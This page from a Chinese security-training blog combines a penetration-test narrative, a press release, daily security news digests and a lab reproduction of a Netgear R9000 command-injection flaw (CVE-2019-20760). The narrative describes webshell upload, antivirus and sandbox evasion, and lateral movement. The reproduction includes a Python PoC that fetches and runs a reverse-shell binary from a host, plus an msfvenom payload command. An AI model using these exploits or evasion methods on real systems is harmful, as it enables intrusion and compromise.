记一次有点抽象的渗透经历
0x01 获取webshell 在各种信息搜集中,发现某个ip的端口挂着一个比较老的服务。 首先看到了员工工号和手机号的双重验证,也不知道账号是什么结构组成的,基本上放弃字典爆破这一条路。于是乎打开之前用灯塔的扫描结果,看看文件泄露是否有什么可用的点。发现其中有一个略显突出的help.html。可能是系统的帮助文档 看得出来也是一个年久失修的系统了,图片的链接都已经404了。但是这里得到了一个示例账号zs001,也知道了初始密码是123456(吐槽:果然年久失修了,这个系统就没有输入密码的input,只有一个手机号验证码)。 知道了账号,这里还缺一个手机号。感觉这个系统应该没做验证,毕竟看上去是一个老旧的系统,估计有没有人用用都不好说,可能是单位那种废弃了但是还没下架的边缘资产。然后随便输入一个手机号上去。果然! 然后随便找个手机接码平台等待验证码发过来,然后过了十几分钟无果,想到可能是废弃资产的原因验证码接口早就失效了。于是没办法只能掏出burp开始爆破,估计验证码也是四位数,如果是六位数验证码大概率没系了。但是这波运气还算可以。也是成功爆破出来了。 然后登录后台直接上传一个木马,没有任何过滤。emmmmmmm开始怀念过去。那时候的洞是真好挖啊。 但是访问的时候出现了一个坏消息。404了,404了怎么办呢。想到了可能目标服务器上有杀软之类的东西。木马可能是上传到服务器上了,然后再上传到服务器之后被杀软自动隔离,那么这时候访问就会出现404。 0x02 webshell免杀 这里中途又替换了几个github上的免杀木马,均无效。ps:我是懒狗,免杀什么的能不写代码就不写代码。php这玩意有个好处,就是语法特别脏,各种免杀手法层出不穷,花里胡哨。这里就简单的介绍几种比较偷懒的方法。 2.1 无字母webshell 个人在实际渗透过程中还算挺好用的,无字母webshell本来是ctf的一些题目,但是事实上免杀效果确实也挺强,而且适应性也比较高,适合一句话木马。之后可以直接上蚁剑链接。 举例: ps:当然都说了偷懒,肯定不是我写的,直接去ctf平台的题目的writeup偷一个就好了。或者直接百度搜索无字母webshell。 免杀效果如下: ps: emmmmmmm,我只能说,无敌好吧。 2.2 一键免杀工具免杀 这里不多说了,去github直接找就是,但是github特征过于明显,以至于被多个杀软厂商标记。现在感觉免杀的效果也不太好了。基本上start高一些的工具生成的webshell都是秒杀。但是可以找一些start数量少的,效果也还不错。 2.3 混淆免杀 混淆免杀,php有很多在线混淆的网站,也就是在不改变代码的功能情况下打乱语法的结构使得代码变为不可读或者可读性很差的代码防止其他人去修改。 可以直接去网上搜索php混淆 这里就是用的就是在线混淆php代码的方式直接过了目标主机上的杀软。 0x03 绕过杀软上线 接下来就是传frp代理,上cs的操作了。这里先上一个cs,但是由于目标机器上有杀软,所以采用shellcode加加载器的方式去进行绕过。众所周知,cs的特征较为明显,很容易就会被杀软拦截。 首先是shellcode免杀,shellcode免杀可以使用github上的sgn加密工具,免杀效果能达到vt0检测。github链接:https://github.com/EgeBalci/sgn 使用方法也很简单,把cs生成的shellcode放在sgn文件夹中执行 ,***.sgn就是免杀之后的shellcode了。 sgn.exe shellcode文件名 免杀前效果 免杀后效果 剩下的就是加载器本身的免杀了,这里我就用github随便clone下来的加载器。可以看到编译完成都没来得及运行就直接被杀了。那么怎么在不动加载器的源代码的情况下。完成免杀效果呢。 其实有一个比较抽象的技巧,就是当文件足够大之后,杀软的沙箱就不会去运行该程序,从而实现绕过杀软的检测。比如一个几百m的exe杀软就不会去检测。 那么怎么能让文件变得足够大呢?就是不断往文件后面填充垃圾字符,比如\x00这样既不会影响exe执行,又能够让exe变得足够大。比如我用python不断往文件后面追加\x00字符。 这里上代码 with open('1.exe', 'ab') as f:\f.write(b'\x00' * 1024 * 1024 * 100) 可以看到每次运行add.py 1.exe就大了100m。 然后多次运行,当1.exe达到2g的时候,根据每个杀毒软件版本不一定能用。有些新的杀软不会检测文件大小判断是否运行。(这个方法很玄学,不是很稳定,有时候能有有时候不能用。但是还是值得一试,毕竟是老前辈传承下来的经典免杀手法。) 但是问题来了,2个g的文件怎么上传到服务器又是一个问题,这里就要说明一下\x00的好处了,可以通过压缩成zip的方式把exe压缩,压缩文件的体积其实还是和之前编译好的文件差不多大。然后只能很方便的就能够把压缩包上传到服务器,然后通过服务器的命令去进行解压。也可以通过webshell去实现解压文件的功能。 0x04 内网移动 之后便是熟悉的内网横向环节了。首先是看到了一个弱口令,然后直接链接数据库然后getshell。 然后直接net user add,之后3389链接上服务器,翻出了一个密码本。 找到一个双网卡的sql server服务器,然后上线,扫一波SMB 最后找到重要系统10.x.x.x 这个系统,看着是java写的后端,也是一个看起来很老的界面了。 扫了一下路径发现存在druid。 原本想找session登录的,然后想了一下试一下运气直接怼一波st2,成功拿下(也是运气爆棚)
喜报 | 蚁景科技再创佳绩 获得“方班演武堂”活动赛亚军
近日,蚁景科技在由中国网络空间安全教育论坛(简称“网教盟”)主办、广州大学方滨兴院士班承办的第七期“方班演武堂”课程活动赛(第135届广交会网络平台众测行动)中,以出色的表现和专业技能赢得了团体积分第二名的荣誉。这是蚁景科技继上一届广交会测试赛团体积分获得第2名后,再次获得亚军殊荣。 在这场竞争激烈的比赛中,蚁景科技的12名讲师及学员展现出了卓越的网安技术实力和深厚的专业能力。特别是在选手个人榜排名中,蚁景科技的Mingy讲师与一叶讲师分别以第2名和第7名的成绩登上了排行榜的前十,这些成绩充分证明了蚁景科技在网络安全人才培养领域的领先地位和人才优势。 蚁景科技又一次的突破性成就,不仅展示了公司在网络安全领域的专业能力,也凸显了其持续投入于人才培养和技术研发的决心。通过参与这样的高水平竞赛实战,蚁景科技在提升学员技术水平的同时,也为推动网络安全领域发展做出了贡献。 关于蚁景科技 湖南蚁景科技有限公司,作为专业的“网络安全人才培养服务提供商”,致力于配合国家网络安全人才培养战略,精准对接行业人才市场的需求。公司秉承提升网络安全实战能力为核心的培养目标,紧密结合用人单位在网络安全岗位上的技能要求,提供前沿、系统且专业的网络安全实战技能培训。同时也针对政企单位、科研院所等行业客户,量身定制网络安全培训方案,以满足其特定的培训需求。 此外,蚁景科技紧密结合高校网络安全人才培养体系,基于对“互联网+教育”的精准把握,依托自主研发的网络安全人才实训平台——蚁景网安实验室,高效构建多样化的网络安全实验场景,全面满足高校教师的在线实验教学需求,同时也为网络安全爱好者提供了优质的在线实操学习环境。
网络安全日报 2024年05月17日
1、苹果修复了Pwn2Own中利用的Safari WebKit零日漏洞 https://www.bleepingcomputer.com/news/apple/apple-fixes-safari-webkit-zero-day-flaw-exploited-at-pwn2own/ Apple发布了安全更新,以修复今年Pwn2Own温哥华黑客竞赛中被利用的Safari网络浏览器中的零日漏洞。该公司通过改进的检查解决了运行macOS Monterey和macOS Ventura的系统上的安全漏洞(追踪为CVE-2024-27834)。苹果在周一的公告中解释说:“具有任意读写能力的攻击者可能能够绕过指针身份验证。”Arm64e架构上使用指针身份验证代码(PAC)来检 2、D-Link EXO AX4800路由器中的RCE零日漏洞PoC漏洞已发布 https://ssd-disclosure.com/ssd-advisory-d-link-dir-x4860-security-vulnerabilities/ D-Link EXO AX4800 (DIR-X4860)路由器容易受到未经身份验证的远程命令执行的攻击,这可能导致有权访问HNAP端口的攻击者完全接管设备。D-Link DIR-X4860路由器是一款高性能Wi-Fi 6路由器,速度高达4800 Mbps,并具有OFDMA、MU-MIMO和BSS Coloring等高级功能,可提高效率并减少干扰。该设备在加拿大特别受欢迎,根据D-Link网站,它在全球市场上销售,并且仍然受到供 3、微软修复了4月份Windows更新导致的VPN故障 https://www.bleepingcomputer.com/news/microsoft/microsoft-fixes-vpn-failures-caused-by-april-windows-updates/ 今天,微软修复了安装2024年4月Windows安全更新后导致客户端和服务器平台之间VPN连接中断的已知问题。安装2024年4月安全更新或2024年4月非安全预览更新后,Windows设备可能会面临VPN连接失败。受影响的Windows版本列表包括Windows 11、Windows 10和Windows Server 2008及更高版本。虽然微软没有提供这些VPN故障的根本 4、Nissan 数据泄露影响 53,000 名员工 https://www.securityweek.com/nissan-data-breach-impacts-53000-employees/ 日产北美公司本周通知缅因州总检察长,去年发起的勒索软件攻击导致员工的个人信息遭到泄露。 5、 INC勒索软件源代码在黑客论坛上以30万美元出售 https://www.secrss.com/articles/66098 在涉嫌出售同时,INC Ransom的运营也在发生变化,这可能表明其核心团队成员之间出现分歧,或者计划进入一个涉及使用新的加密器的阶段。 6、CISA 及其合作伙伴发布民间社会组织网络安全指南 https://www.infosecurity-magazine.com/news/cisa-unveil-cybersecurity-guide/ 指南特别强调了保持软件更新、实施防网络钓鱼的多因素身份验证、审计和禁用未使用的账户以及应用最小特权原则以尽量减少访问漏洞的重要性。 7、泰国对外贸易促进委员会50万用户数据库遭泄露 https://www.secrss.com/articles/66127 泰国对外贸易促进委员会(Department of International Trade Promotion)泄露的数据包括个人身份信息 (PII),例如名字、姓氏、用户名、身份证号码、DITP ID、单点登录 (SSO) ID、电话号码、电子邮件地址、公司名称、出口商详细信息、地址、密码等。上述内容皆已被黑客公开。 8、30% 的 CVE 漏洞利用事件再次发现 Log4Shell https://www.helpnetsecurity.com/2024/05/14/log4j-wan-insecure-protocols/ 虽然零日安全漏洞在业内备受关注,但研究人员发现,威胁攻击者往往不会使用新漏洞,反而喜欢针对未打补丁的系统(有很多带有漏洞的系统,不进行补丁修复安全漏洞),开展网络攻击行动。 9、警惕,Foxit PDF 阅读器存在安全”缺陷“ https://www.freebuf.com/news/401073.html Check Point Research 近日发现了一种针对 Foxit Reader 用户的 PDF 安全漏洞利用的异常操作模式,该安全漏洞会触发安全警告,诱使毫无戒心的用户执行”有害“命令。目前,该安全漏洞的变体在野外正被积极利用 10、新的 Wi-Fi 漏洞可通过降级攻击进行网络窃听 https://thehackernews.com/2024/05/new-wi-fi-vulnerability-enabling.html 研究人员发现了一个新的安全漏洞,该漏洞源自 IEEE 802.11 Wi-Fi 标准中的设计缺陷,该漏洞会诱骗受害者连接到安全性较低的无线网络并窃听其网络流量。SSID混淆攻击(编号为 CVE-2023-52424)会影响所有操作系统和 Wi-Fi 客户端,包括基于 WEP、WPA3、802.11X/EAP 和 AMPE 协议的家庭和网状网络。 声明 以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景科技观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景科技一律不予承担。
网络安全日报 2024年05月16日
1、微软修补了61个漏洞包括两个被积极利用的零日漏洞 https://msrc.microsoft.com/update-guide/releaseNote/2024-May 作为2024年5月补丁星期二更新的一部分,微软已解决了其软件中总共61个新的安全漏洞,其中包括两个已被广泛利用的零日漏洞。在61个缺陷中,1个缺陷的严重程度被评为“严重”,59个缺陷的严重程度被评为“重要”,1个缺陷的严重程度被评为“中等”。过去一个月,基于Chromium的Edge浏览器解决了30个漏洞,其中包括两个最近披露的零日漏洞(CVE-2024-4671和CVE-2024-4761),这些漏洞已被标记为在攻击中被利用。 2、勒索攻击组织采用新型社工手段诱导目标安装远控工具 https://www.rapid7.com/blog/post/2024/05/10/ongoing-social-engineering-campaign-linked-to-black-basta-ransomware-operators 研究人员发现了一项正在进行的社会工程活动,该活动用垃圾邮件轰炸企业,其目的是获得对其环境的初始访问权限以进行后续利用。该事件涉及威胁行为者用垃圾邮件淹没用户的电子邮件,并致电用户提供帮助。威胁行为者会提示受影响的用户下载AnyDesk等远程监控和管理软件,或利用Microsoft的内置快速协助功能来建立远程连接。据称,这一新颖的活动自2024年4月下 3、VMware修复了Workstation和Fusion产品中的严重安全漏洞 https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/24280 VMware Workstation和Fusion产品中已披露多个安全漏洞,威胁行为者可利用这些漏洞访问敏感信息、触发拒绝服务(DoS)条件并在某些情况下执行代码。Broadcom旗下的虚拟化服务提供商表示,这四个漏洞影响Workstation版本17.x和Fusion版本13.x,修复程序分别在版本17.5.2和13.5.2中提供。 4、新的Chrome零日漏洞CVE-2024-4761正在被利用 https://chromereleases.googleblog.com/2024/05/stable-channel-update-for-desktop_13.html 谷歌周一发布了紧急修复程序,以解决Chrome网络浏览器中的一个新的零日漏洞,该漏洞已被广泛利用。该高严重性漏洞(编号为CVE-2024-4761)是一个影响V8 JavaScript和WebAssembly引擎的越界写入错误。该消息于2024年5月9日匿名报道。越界写入错误通常可能被恶意行为者利用来破坏数据、引发崩溃或在受感染的主机上执行任意代码。 5、Cacti框架中的严重漏洞可能会让攻击者执行恶意代码 https://thehackernews.com/2024/05/critical-flaws-in-cacti-framework-could.html Cacti开源网络监控和故障管理框架的维护者已经解决了十几个安全漏洞,其中包括两个可能导致执行任意代码的关键问题。最严重的漏洞为CVE-2024-25641(CVSS评分:9.1):“包导入”功能中存在任意文件写入漏洞,允许具有“导入模板”权限的经过身份验证的用户在Web服务器上执行任意PHP代码,从而导致远程代码执行。CVE-2024-29895(CVSS评分:10.0):当PHP的“register_argc_argv”选项打开时, 6、苹果和谷歌推出跨平台功能来检测恶意蓝牙跟踪设备 https://www.apple.com/newsroom/2023/05/apple-google-partner-on-an-industry-specification-to-address-unwanted-tracking 苹果和谷歌周一正式宣布推出一项新功能,如果蓝牙跟踪设备被用来在用户不知情或未经同意的情况下秘密监视他们,该功能会通知iOS和Android的用户。两家公司在一份联合声明中表示:“这将有助于减少旨在帮助跟踪财物的设备的滥用情况。”并补充说,其目的是解决“用户隐私和安全的潜在风险”。跨平台解决方案的提案最初是在一年前由两家科技巨头推出的。 7、英特尔针对 90 多个漏洞发布 41 条安全公告 https://www.securityweek.com/intel-publishes-41-security-advisories-for-over-90-vulnerabilities/ 本周二补丁,英特尔发布了 41 条新的安全公告,涵盖该公司产品中发现的总共 90 多个漏洞。 8、FBI 再次查封 BreachForums,敦促用户举报犯罪活动 https://thehackernews.com/2024/05/fbi-seizes-breachforums-again-urges.html 执法机构一年内第二次正式控制了兜售被盗数据而闻名的BreachForums平台。该行动是澳大利亚、冰岛、新西兰、瑞士、英国、美国和乌克兰当局合作执行的。FBI 还控制了Baphomet 运营的Telegram 频道,Baphomet 在其前任 Conor Brian Fitzpatrick(又名pompompurin)去年 3 月被捕后成为该论坛的管理员。 9、Adobe 修复了 Acrobat 和 Reader 中的多个严重漏洞 https://securityaffairs.com/163194/security/adobe-flaws-acrobat-reader.html Adobe 解决了多种产品(包括 Adobe Acrobat 和 Reader)中的多个代码执行漏洞。 10、谷歌为 Android 设备推出人工智能防盗数据保护功能 https://thehackernews.com/2024/05/google-adds-ai-powered-theft-protection.html 谷歌在 Android 中宣布了一系列隐私和安全功能,其中包括一套高级保护功能,可在发生盗窃时帮助保护用户的设备和数据。这家科技巨头表示,这些功能旨在帮助在盗窃企图之前、期间和之后保护数据,并补充说,预计这些功能将通过运行 Android 10 及更高版本的设备的 Google Play 服务更新提供。 声明 以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景科技观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景科技一律不予承担。
网络安全日报 2024年05月15日
1、Careto组织针对拉丁美洲和中非组织发起网络间谍活动 https://www.darkreading.com/cyberattacks-data-breaches/-the-mask-espionage-group-resurfaces-after-10-year-hiatus 十多年来失踪的高级持续威胁(APT)组织突然在针对拉丁美洲和中非组织的网络间谍活动中重新出现。该组织名为“Careto”或“The Mask”,于2007年开始运作,然后在2013年似乎消失得无影无踪。在此期间,这个讲西班牙语的威胁行为者在美国、英国等31个国家/地区造成了大约380名不同的受害者、法国、德国、中国和巴西。研究人员在10年前追踪过Careto,最近也发现 2、欧洲刑警组织确认网站遭到破坏但是没有操作数据被盗 https://www.bleepingcomputer.com/news/security/europol-confirms-web-portal-breach-says-no-operational-data-stolen/ 欧盟执法机构欧洲刑警组织确认其欧洲刑警组织专家平台(EPE)门户遭到破坏,目前正在调查这一事件,此前一名威胁行为者声称他们窃取了包含机密数据的仅供官方使用(FOUO)文件。EPE是执法专家用来“分享犯罪知识、最佳实践和非个人数据”的在线平台。欧洲刑警组织已了解这一事件,正在评估情况。已经采取了初步行动。该事件涉及欧洲刑警组织专家平台(EPE)封闭用户组。此EPE应用 3、研究人员披露恶意安卓远程访问木马可窃取用户凭证 https://blog.sonicwall.com/en-us/2024/04/android-remote-access-trojan-equipped-to-harvest-credentials/ 据观察,伪装成Google、Instagram、Snapchat、WhatsApp和X(以前称为Twitter)的恶意Android应用程序会从受感染的设备中窃取用户的凭据。该恶意软件使用著名的Android应用程序图标来误导用户并诱骗受害者在其设备上安装恶意应用程序。该活动的分布向量目前尚不清楚。但是,一旦该应用程序安装在用户的手机上,它就会要求用户授予其访问辅助服务和设备管理员API的 4、澳大利亚最大的非银行贷款机构Firstmac Limited遭遇数据泄露 https://www.bleepingcomputer.com/news/security/largest-non-bank-lender-in-australia-warns-of-a-data-breach/ Firstmac Limited警告客户,在新的Embargo网络勒索组织泄露了据称从该公司窃取的超过500GB数据的第二天,该公司遭遇了数据泄露。Firstmac是澳大利亚金融服务行业的重要参与者,主要专注于抵押贷款、投资管理和证券化服务。该公司总部位于昆士兰州布里斯班,拥有460名员工,已发放10万笔住房贷款,目前管理着150亿美元的抵押贷款。昨天,Have I Been P 5、The Post Millennial新闻网遭遇网络攻击导致2600万人数据泄露 https://www.bleepingcomputer.com/news/security/the-post-millennial-hack-leaked-data-impacting-26-million-people/ Have I Been Pwned添加了26818266人的信息,这些人的数据在The Post Millennial保守派新闻网站最近遭到黑客攻击时被泄露。The Post Millennial是加拿大保守派在线新闻杂志,隶属于Human Events媒体集团,该集团还运营着美国的Human Events新闻平台。本月早些时候,这两个新闻平台均遭到黑客攻击,其网站的首 6、研究发现部分AI已学会“说谎”,未来或演变成更高级欺骗形式 https://www.cell.com/patterns/fulltext/S2666-3899(24)00103-X 美国麻省理工学院的研究团队近日发布成果称,部分 AI 已经“学会欺骗人类”,该成果刊登在最新一期的期刊《模式》(Pattern)上。 7、合成 ID 欺诈在汽车贷款行业上升了 98% https://www.inforisktoday.com/synthetic-id-fraud-rises-98-in-auto-lending-industry-a-25157 合成身份欺诈者最主要针对汽车贷款行业,导致 2023 年的尝试次数增加了 98%,该行业损失高达 79 亿美元。Point Predictive 对 1.8 亿份贷款申请的研究发现,收入和就业虚假陈述、合成身份和信用清洗占汽车贷款人面临的风险的近 75%。 8、严重Next.js漏洞能让攻击者破坏服务器 https://cybersecuritynews.com/next-js-server-compromise/ 根据分享的报告,当威胁行为者利用此漏洞时,可能会导致Next.js的响应不同步,进而导致响应队列中毒。 9、黑客组织 FIN7 借用 Google Ads 传播恶意软件 https://www.freebuf.com/news/400742.html 近日,网络安全研究人员发现黑客组织 FIN7 滥用 Google Ads ,散播、部署恶意软件 NetSupport RAT。 10、微软警告被利用的零日漏洞,修补了 60 个 Windows 漏洞 https://www.securityweek.com/microsoft-patches-60-windows-vulns-warns-of-active-zero-day-exploitation/ 星期二补丁:微软记录了多个软件产品中的 60 个安全漏洞,并标记了一个被积极利用的 Windows 零日漏洞,以供紧急关注。 声明 以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景科技观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景科技一律不予承担。
Netgear无线路由器漏洞复现(CVE-2019-20760)
漏洞概述 漏洞服务: uhttpd 漏洞类型: 远程命令执行 影响范围: 1.0.4.26之前的NETGEAR R9000设备会受到身份验证绕过的影响 解决建议: 更新版本 漏洞复现 操作环境: ubuntu:22.04 qemu-version: 8.1.1 仿真环境 wget https://www.downloads.netgear.com/files/GDC/R9000/R9000-V1.0.4.26.zip 下载固件。 binwalk -Mer R9000-V1.0.4.26.img 可通过 binwalk 常规解压获得文件系统。 检查 ELF32 文件架构为 arm-32-little。 wget https://file.erlkonig.tech/debian-armhf/wheezy/debian_wheezy_armhf_standard.qcow2 wget https://file.erlkonig.tech/debian-armhf/wheezy/initrd.img-3.2.0-4-vexpress wget https://file.erlkonig.tech/debian-armhf/wheezy/vmlinuz-3.2.0-4-vexpress 下载合适的虚拟机映像。 #!/bin/sh # 参考《CTF实战》by ChaMd5 # 'ens33': The NIC is that can connect internet #sudo ifconfig eth0 down                 # 首先关闭宿主机网卡接口 sudo brctl addbr br0                     # 添加一座名为 br0 的网桥 sudo brctl addif br0 ens33               # 在 br0 中添加一个接口 sudo brctl stp br0 off                   # 如果只有一个网桥,则关闭生成树协议 sudo brctl setfd br0 1                   # 设置 br0 的转发延迟 sudo brctl sethello br0 1                # 设置 br0 的 hello 时间 sudo ifconfig br0 0.0.0.0 promisc up     # 启用 br0 接口 sudo ifconfig ens33 0.0.0.0 promisc up   # 启用网卡接口 sudo dhclient br0                        # 从 dhcp 服务器获得 br0 的 IP 地址 sudo brctl show br0                      # 查看虚拟网桥列表 sudo brctl showstp br0                   # 查看 br0 的各接口信息 sudo tunctl -t tap0 -u root              # 创建一个 tap0 接口,只允许 root 用户访问 sudo brctl addif br0 tap0                # 在虚拟网桥中增加一个 tap0 接口 sudo ifconfig tap0 0.0.0.0 promisc up    # 启用 tap0 接口 sudo brctl showstp br0 配置网络。 #!/bin/sh qemu-system-arm \    -M vexpress-a9 \    -kernel vmlinuz-3.2.0-4-vexpress \    -initrd initrd.img-3.2.0-4-vexpress \    -drive if=sd,file=debian_wheezy_armhf_standard.qcow2 \    -append "root=/dev/mmcblk0p2 console=ttyAMA0" \    -net nic -net tap,ifname=tap0,script=no,downscript=no \    -nographic-M             # 选择开发板• -m # 指定内存大小 -drive            # 定义存储驱动器• file=            # 定义镜像文件• -net nic          # 创建客户机网卡• -net tap                    # 创建 tap 设备,以桥接方式跟宿主机通信• ifname=virtual0             # tap 设备与名为 virtual0 的虚拟网卡进行桥接通信• -nographic                  # 以非图形化模式启动• -append          # 内核启动附加参数• -console=ttyAMA0    # console指向串口,有此启动参数,内核启动日志才能输出到宿主机终端 -nographic # 不再启用额外的终端界面 启动 qemu-system-armhf 环境,默认用户名密码都为 root。 ifconfig eth0 192.168.152.168/24 为 qemu-system-armhf 配置静态 IP。 tar -cvf squashfs-root.tar.gz squashfs-root/ python3 -m http.server 将文件根系统打包,然后利用 python3 的 http.server 模块下载到 qemu-system-armhf 的根目录中并用 tar xvf squashfs-root.tar.gz 解压。 cd /squashfs-root mount --bind /proc proc # proc目录是一个虚拟文件系统,可以为linux用户空间和内核空间提供交互 mount --bind /dev dev   # /dev/下的设备是通过创建设备节点生成的,用户通过此设备节点来访问内核里的驱动 chroot . sh 因为 chroot 会导致无法在隔离的文件系统中访问原本的 /proc和 /dev 目录,这里利用 mount 命令将 qemu-system-armhf 的 proc 和 dev 目录挂在到 squashfs-root 中,并更换根目录为 squashfs-root。 Web模拟 find -name uhttpd cat ./etc/init.d/uhttpd# ./etc/init.d/uhttpd ... start() { #config_load uhttpd #config_foreach start_instance uhttpd #mkdir /tmp/www #cp -rf /usr/www/* /tmp/www /www/cgi-bin/uhttpd.sh start inetd detplc    #for bug58012    touch /tmp/fwcheck_status } ... 查找 uhttpd 的相关文件。 #!/bin/sh REALM=`/bin/cat /module_name | sed 's/\n//g'` UHTTPD_BIN="/usr/sbin/uhttpd" PX5G_BIN="/usr/sbin/px5g" uhttpd_stop() { kill -9 $(pidof uhttpd) } uhttpd_start() {        $UHTTPD_BIN -h /www -r ${REALM}  -x /cgi-bin -t 70 -p 0.0.0.0:80 -C /etc/uhttpd.crt -K /etc/uhttpd.key -s 0.0.0.0:443 } case "$1" in stop) uhttpd_stop ;; start) uhttpd_start ;; restart) uhttpd_stop uhttpd_start ;; *) logger -- "usage: $0 start|stop|restart" ;; esac 查看 start() 函数中利用的 /www/cgi-bin/uhttpd.sh 脚本。发现启动命令为 $UHTTPD_BIN -h /www -r ${REALM} -x /cgi-bin -t 70 -p 0.0.0.0:80 -C /etc/uhttpd.crt -K /etc/uhttpd.key -s 0.0.0.0:443 其中 REALM = R9000 ,UHTTPD_BIN = /usr/sbin/uhttpd。我们无需开启 https,所以启动命令为 /usr/sbin/uhttpd -h /www -r R9000 -x /cgi-bin -t 70 -p 0.0.0. 逆向分析 wget https://www.downloads.netgear.com/files/GDC/R9000/R9000-V1.0.4.28.zip 获取修复版本的固件。因为源码较为繁杂,我们通过 Bindiff 进行二进制比对,来查找漏洞点。 shift+D 选取修复版本的 /usr/sbin/uhttpd 文件即可,主要查看登录验证的 uh_cgi_auth_check() 函数。  memset(s, 0, 0x1000u);  v14 = strlen(v13);  uh_b64decode(s, 0xFFF, v13 + 6, v14 - 6);  v15 = strchr(s, ':');  if ( !v15 ) { LABEL_32:    v16 = 0;    v17 = 0;    goto LABEL_15; }  v16 = v15 + 1;  *v15 = 0;  if ( v15 != (char *)0xFFFFFFFF ) {    snprintf(command, 0x80u, "/usr/sbin/hash-data -e %s >/tmp/hash_result", v15 + 1);    system(command);    v3 = cat_file(73805); }  v17 = s 漏洞版本 base64 解密后 snprintf() 后直接传给 system() 执行,这里会把 v15(:)后面的内容放到 %s 处,记得加\n来执行多条指令。  memset(s, 0, 0x1000u);  v15 = strlen(v14);  uh_b64decode(s, 4095, v14 + 6, v15 - 6);  v16 = strchr(s, 58);  if ( !v16 ) { LABEL_15:    v17 = 0;    v18 = 0;    goto LABEL_16; }  v17 = v16 + 1;  *v16 = 0;  if ( v16 != (char *)-1 ) {    v18 = s;    dni_system("/tmp/hash_result", 0, 0, "/usr/sbin/hash-data", "-e", v17, 0);    v19 = cat_file("/tmp/hash_result");    goto LABEL_17; } 而修复版本则利用 dni_system() 执行,只可控参数。 获取权限 poc: #!/usr/bin/python3 from pwn import * import requests import base64 cmd  = 'admin:' cmd += '`' cmd += 'wget http://192.168.152.167:8000/shell.elf\n' cmd += 'chmod 777 ./shell.elf\n' cmd += './shell.elf\n' cmd += '`' assert(len(cmd) < 255) cmd_b64 = base64.b64encode(cmd.encode()).decode() headers = {    "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0",    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",    "Accept-Encoding": "gzip, deflate",    "Connection": "keep-alive",    "Upgrade-Insecure-Requests": "1",    "Authorization": "Basic " + cmd_b64 } def attack():    try:        requests.get("http://192.168.152.168/cgi-bin/", headers=headers, timeout=3)    except Exception as e:        print(e) attack()msfvenom -p linux/armle/shell_reverse_tcp LHOST=192.168.152.167 LPORT=10086 -f elf > shell.elf 利用 msf 生成对应架构的木马程序,然后在shell.elf所在的目录开启http服务,利用漏洞将木马程序下载下来。 启动监听,并执行 exp.py 成功获取 shell,我们利用获取的权限在 www 目录创建 flag.txt 文件然后访问它。 成功创建。
网络安全日报 2024年05月14日
1、FIN7组织利用恶意Google广告传播NetSupport RAT https://www.esentire.com/blog/fin7-uses-trusted-brands-and-sponsored-google-ads-to-distribute-msix-payloads/ 据观察,出于经济动机的威胁行为者FIN7利用欺骗合法品牌的恶意Google广告作为提供MSIX安装程序的手段,最终部署NetSupport RAT。攻击者利用恶意网站冒充知名品牌,包括AnyDesk、WinSCP、BlackRock、Asana、Concur、华尔街日报、Workable和Google Meet。FIN7(又名Carbon Spider和Sangria Temp 2、恶意Python包在虚假请求库徽标中隐藏Sliver C2框架 https://blog.phylum.io/malicious-go-binary-delivered-via-steganography-in-pypi/ 研究人员发现了一个恶意Python包,该包声称是流行的requests库的一个分支,并且被发现在该项目徽标的PNG图像中隐藏了Golang版本的Sliver命令与控制(C2)框架。使用这种隐写术的包是requests-darwin-lite,在从Python包索引(PyPI)注册表中删除之前,该包已被下载417次。Requests-darwin-lite似乎是流行的requests包的一个分支,有一些关键的区别,最明显的是包含一个恶意 3、欧洲刑警组织正在调查数据泄露事件 https://www.securityweek.com/europol-investigating-breach-after-hacker-offers-to-sell-classified-data/ 欧洲刑警组织在一名著名黑帽黑客提出出售据称从执法机构系统中窃取的机密数据后展开调查。这位名为 IntelBroker 的黑客于 5 月 10 日宣布,他获得了欧洲刑警组织系统的访问权限,并获得了仅供官方使用 (FOUO) 和机密数据,包括员工信息、源代码以及“侦察”和指导文件。黑客声称这些数据来自欧洲刑警组织内的几个“机构”。 4、苹果周一推出了紧急安全更新,修复被利用的0day漏洞 https://www.securityweek.com/apple-patch-day-code-execution-flaws-in-iphones-ipads-macos/ 苹果周一对其移动和桌面操作系统推出了紧急安全主题更新,并警告称,黑客可能已经在野外利用了 IOS 漏洞。安全响应团队记录了 iPhone 和 iPad 上的至少 16 个漏洞,并呼吁特别关注 CVE-2024-23296,这是 RTKit 中的一个内存损坏错误,该公司表示,在补丁发布之前“可能已被利用”。 5、Black Basta勒索软件攻击了北美、欧洲和澳洲的500 多个公司 https://thehackernews.com/2024/05/black-basta-ransomware-strikes-500.html 自 2022 年 4 月出现以来,Black Basta 勒索软件即服务 (RaaS) 行动已针对北美、欧洲和澳大利亚的 500 多个私营行业和关键基础设施实体。 6、中美将就人工智能风险和安全进行高层会谈 https://www.bankinfosecurity.com/us-china-to-hold-discussions-on-ai-risks-security-a-25181 美国和中国将启动有关人工智能的高层讨论,重点关注与先进人工智能系统相关的安全和风险。 7、Nmap 7.95 发布,带有新的操作系统和服务检测签名 https://www.helpnetsecurity.com/2024/05/10/nmap-7-95-released/ Nmap 7.95 引入了重大更新,增加了 336 个新签名,使总数达到 6,036 个。值得注意的新增内容包括对最新 iOS 版本 15 和 16、macOS Ventura 和 Monterey、Linux 6.1、OpenBSD 7.1 和 lwIP 2.2 的支持。 8、美国医疗保健提供商MediExcel 曝光 50 万份患者文件 http://www.anquan419.com/knews/24/6843.html Cybernews 研究小组发现,MediExcel 有数十万份医疗文件处于开放状态,任何人都可以访问。据该小组称,大多数暴露的信息都揭示了有关 MediExcel 患者的敏感细节。 9、谷歌云重大配置错误事故,澳养老基金 UniSuper 账户被删 https://www.ithome.com/0/767/236.htm 